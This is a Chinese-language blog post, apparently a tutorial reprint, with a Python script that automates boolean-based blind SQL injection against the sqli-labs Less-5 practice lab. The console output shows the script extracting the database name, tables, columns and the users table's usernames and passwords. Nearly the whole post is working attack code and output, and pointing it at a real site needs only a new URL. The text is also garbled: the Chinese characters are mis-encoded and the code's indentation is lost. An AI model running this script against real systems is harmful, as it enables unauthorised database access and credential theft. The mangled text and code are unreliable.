好久沒(méi)寫python了��,就想著寫個(gè)簡(jiǎn)單的練練手,寫個(gè)布爾型盲注自動(dòng)化腳本���,我覺(jué)得這個(gè)功能寫的非常全了,這里是參考sqli-labs里面的盲注漏洞進(jìn)行的腳本編寫�����。
bool_sqlblind.py
# -*- coding:utf-8 -*-
# Author: mochu7
import requests
def ascii_str():#生成庫(kù)名表名字符所在的字符列表字典
str_list=[]
for i in range(33,127):#所有可顯示字符
str_list.append(chr(i))
#print('可顯示字符:%s'%str_list)
return str_list#返回字符列表
def db_length(url,str):
print("[-]開(kāi)始測(cè)試數(shù)據(jù)庫(kù)名長(zhǎng)度.......")
num=1
while True:
db_payload=url+"' and (length(database())=%d)--+"%num
r=requests.get(db_payload)
if str in r.text:
db_length=num
print("[+]數(shù)據(jù)庫(kù)長(zhǎng)度:%d\n"%db_length)
db_name(db_length)#進(jìn)行下一步����,測(cè)試庫(kù)名
break
else:
num += 1
def db_name(db_length):
print("[-]開(kāi)始測(cè)試數(shù)據(jù)庫(kù)名.......")
db_name=''
str_list=ascii_str()
for i in range(1,db_length+1):
for j in str_list:
db_payload=url+"' and (ord(mid(database(),%d,1))='%s')--+"%(i,ord(j))
r=requests.get(db_payload)
if str in r.text:
db_name+=j
break
print("[+]數(shù)據(jù)庫(kù)名:%s\n"%db_name)
tb_piece(db_name)#進(jìn)行下一步,測(cè)試security數(shù)據(jù)庫(kù)有幾張表
return db_name
def tb_piece(db_name):
print("開(kāi)始測(cè)試%s數(shù)據(jù)庫(kù)有幾張表........"%db_name)
for i in range(100):#猜解庫(kù)中有多少?gòu)埍?����,合理范圍即?
tb_payload=url+"' and %d=(select count(table_name) from information_schema.tables where table_schema='%s')--+"%(i,db_name)
r=requests.get(tb_payload)
if str in r.text:
tb_piece=i
break
print("[+]%s庫(kù)一共有%d張表\n"%(db_name,tb_piece))
tb_name(db_name,tb_piece)#進(jìn)行下一步�����,猜解表名
def tb_name(db_name,tb_piece):
print("[-]開(kāi)始猜解表名.......")
table_list=[]
for i in range(tb_piece):
str_list=ascii_str()
tb_length=0
tb_name=''
for j in range(1,20):#表名長(zhǎng)度��,合理范圍即可
tb_payload=url+"' and (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d--+"%(i,j)
r=requests.get(tb_payload)
if str in r.text:
tb_length=j
print("第%d張表名長(zhǎng)度:%s"%(i+1,tb_length))
for k in range(1,tb_length+1):#根據(jù)表名長(zhǎng)度進(jìn)行截取對(duì)比
for l in str_list:
tb_payload=url+"' and (select ord(mid((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)))=%d--+"%(i,k,ord(l))
r=requests.get(tb_payload)
if str in r.text:
tb_name+=l
print("[+]:%s"%tb_name)
table_list.append(tb_name)
break
print("\n[+]%s庫(kù)下的%s張表:%s\n"%(db_name,tb_piece,table_list))
column_num(table_list,db_name)#進(jìn)行下一步,猜解每張表的字段數(shù)
def column_num(table_list,db_name):
print("[-]開(kāi)始猜解每張表的字段數(shù):.......")
column_num_list=[]
for i in table_list:
for j in range(30):#每張表的字段數(shù)量���,合理范圍即可
column_payload=url+"' and %d=(select count(column_name) from information_schema.columns where table_name='%s')--+"%(j,i)
r=requests.get(column_payload)
if str in r.text:
column_num=j
column_num_list.append(column_num)#把所有表的字段,依次放入這個(gè)列表當(dāng)中
print("[+]%s表\t%s個(gè)字段"%(i,column_num))
break
print("\n[+]表對(duì)應(yīng)的字段數(shù):%s\n"%column_num_list)
column_name(table_list,column_num_list,db_name)#進(jìn)行下一步���,猜解每張表的字段名
def column_name(table_list,column_num_list,db_name):
print("[-]開(kāi)始猜解每張表的字段名.......")
column_length=[]
str_list=ascii_str()
column_name_list=[]
for t in range(len(table_list)):#t在這里代表每張表的列表索引位置
print("\n[+]%s表的字段:"%table_list[t])
for i in range(column_num_list[t]):#i表示每張表的字段數(shù)量
column_name=''
for j in range(1,21):#j表示每個(gè)字段的長(zhǎng)度
column_name_length=url+"' and %d=(select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)--+"%(j-1,table_list[t],i)
r=requests.get(column_name_length)
if str in r.text:
column_length.append(j)
break
for k in str_list:#k表示我們猜解的字符字典
column_payload=url+"' and ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d--+"%(table_list[t],i,j,ord(k))
r=requests.get(column_payload)
if str in r.text:
column_name+=k
print('[+]:%s'%column_name)
column_name_list.append(column_name)
#print(column_name_list)#輸出所有表中的字段名到一個(gè)列表中
dump_data(table_list,column_name_list,db_name)#進(jìn)行最后一步,輸出指定字段的數(shù)據(jù)
def dump_data(table_list,column_name_list,db_name):
print("\n[-]對(duì)%s表的%s字段進(jìn)行爆破.......\n"%(table_list[3],column_name_list[9:12]))
str_list=ascii_str()
for i in column_name_list[9:12]:#id,username,password字段
for j in range(101):#j表示有多少條數(shù)據(jù)���,合理范圍即可
data_num_payload=url+"' and (select count(%s) from %s.%s)=%d--+"%(i,db_name,table_list[3],j)
r=requests.get(data_num_payload)
if str in r.text:
data_num=j
break
print("\n[+]%s表中的%s字段有以下%s條數(shù)據(jù):"%(table_list[3],i,data_num))
for k in range(data_num):
data_len=0
dump_data=''
for l in range(1,21):#l表示每條數(shù)據(jù)的長(zhǎng)度����,合理范圍即可
data_len_payload=url+"' and ascii(substr((select %s from %s.%s limit %d,1),%d,1))--+"%(i,db_name,table_list[3],k,l)
r=requests.get(data_len_payload)
if str not in r.text:
data_len=l-1
for x in range(1,data_len+1):#x表示每條數(shù)據(jù)的實(shí)際范圍,作為mid截取的范圍
for y in str_list:
data_payload=url+"' and ord(mid((select %s from %s.%s limit %d,1),%d,1))=%d--+"%(i,db_name,table_list[3],k,x,ord(y))
r=requests.get(data_payload)
if str in r.text:
dump_data+=y
break
break
print('[+]%s'%dump_data)#輸出每條數(shù)據(jù)
if __name__ == '__main__':
url="http://127.0.0.1/sqli-labs/Less-5/?id=1"#目標(biāo)url
str="You are in"#布爾型盲注的truefalse的判斷因素
db_length(url,str)#程序入口
PS C:\Users\Administrator\Desktop> python3 .\bool_sqlblind.py [-]開(kāi)始測(cè)試數(shù)據(jù)庫(kù)名長(zhǎng)度.......
[+]數(shù)據(jù)庫(kù)長(zhǎng)度:8
[-]開(kāi)始測(cè)試數(shù)據(jù)庫(kù)名.......
[+]數(shù)據(jù)庫(kù)名:security
開(kāi)始測(cè)試security數(shù)據(jù)庫(kù)有幾張表........
[+]security庫(kù)一共有4張表
[-]開(kāi)始猜解表名.......
第1張表名長(zhǎng)度:6
[+]:emails
第2張表名長(zhǎng)度:8
[+]:referers
第3張表名長(zhǎng)度:7
[+]:uagents
第4張表名長(zhǎng)度:5
[+]:users
[+]security庫(kù)下的4張表:['emails', 'referers', 'uagents', 'users']
[-]開(kāi)始猜解每張表的字段數(shù):.......
[+]emails表 2個(gè)字段
[+]referers表 3個(gè)字段
[+]uagents表 4個(gè)字段
[+]users表 7個(gè)字段
[+]表對(duì)應(yīng)的字段數(shù):[2, 3, 4, 7]
[-]開(kāi)始猜解每張表的字段名.......
[+]emails表的字段:
[+]:id
[+]:email_id
[+]referers表的字段:
[+]:id
[+]:referer
[+]:ip_address
[+]uagents表的字段:
[+]:id
[+]:uagent
[+]:ip_address
[+]:username
[+]users表的字段:
[+]:id
[+]:username
[+]:password
[+]:level
[+]:id
[+]:username
[+]:password
[-]對(duì)users表的['id', 'username', 'password']字段進(jìn)行爆破.......
[+]users表中的id字段有以下13條數(shù)據(jù):
[+]1
[+]2
[+]3
[+]4
[+]5
[+]6
[+]7
[+]8
[+]9
[+]10
[+]11
[+]12
[+]14
[+]users表中的username字段有以下13條數(shù)據(jù):
[+]Dumb
[+]Angelina
[+]Dummy
[+]secure
[+]stupid
[+]superman
[+]batman
[+]admin
[+]admin1
[+]admin2
[+]admin3
[+]dhakkan
[+]admin4
[+]users表中的password字段有以下13條數(shù)據(jù):
[+]Dumb
[+]I-kill-you
[+]p@ssword
[+]crappy
[+]stupidity
[+]genious
[+]mob!le
[+]admin
[+]admin1
[+]admin2
[+]admin3
[+]dumbo
[+]admin4
PS C:\Users\Administrator\Desktop>
到此這篇關(guān)于python實(shí)現(xiàn)布爾型盲注的示例代碼的文章就介紹到這了,更多相關(guān)python布爾盲注內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
